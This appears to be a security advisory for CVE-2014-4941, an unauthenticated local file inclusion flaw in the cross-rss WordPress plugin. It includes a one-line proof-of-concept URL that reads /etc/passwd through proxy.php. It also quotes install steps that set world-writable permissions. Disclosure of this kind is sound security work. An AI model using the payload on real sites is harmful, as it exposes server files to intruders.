wp-plugin : cross-rss – Local File Inclusion

 

Plugin Details

 

Plugin Name : cross-rss

 

Effected Version : 1.7 (and most probably lower version's if any)

 
Vulnerability : Local File Inclusion
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd

Vulnerable Parameter : rss

 

Disclosure Timeline

 

Vendor Contacted : 2014-02-19

 
Plugin Status : Closed
 
Public Disclosure : May 29, 2014
 
CVE Number : CVE-2014-4941

 
Plugin Description :
 
IP file, place folder cross-rss with all files to wp-content/plugins dir. Go to WordPress Admin Plugins sections and activate Cross-RSS 0.5 plugin
Set chmod 777 to wp-content/plugins/cross-rss/cache (make writable by webserver scripts)
Set chmod 666 to wp-content/plugins/cross-rss/proxy.log (make writable by webserver scripts)

Usage
When create page or blog just place line: [crossrss url=http://example.com/file.rss /] Where http://example.com/file.rss is a full URL to RSS you want to view on your WordPress page

Leave a Reply

Your email address will not be published. Required fields are marked *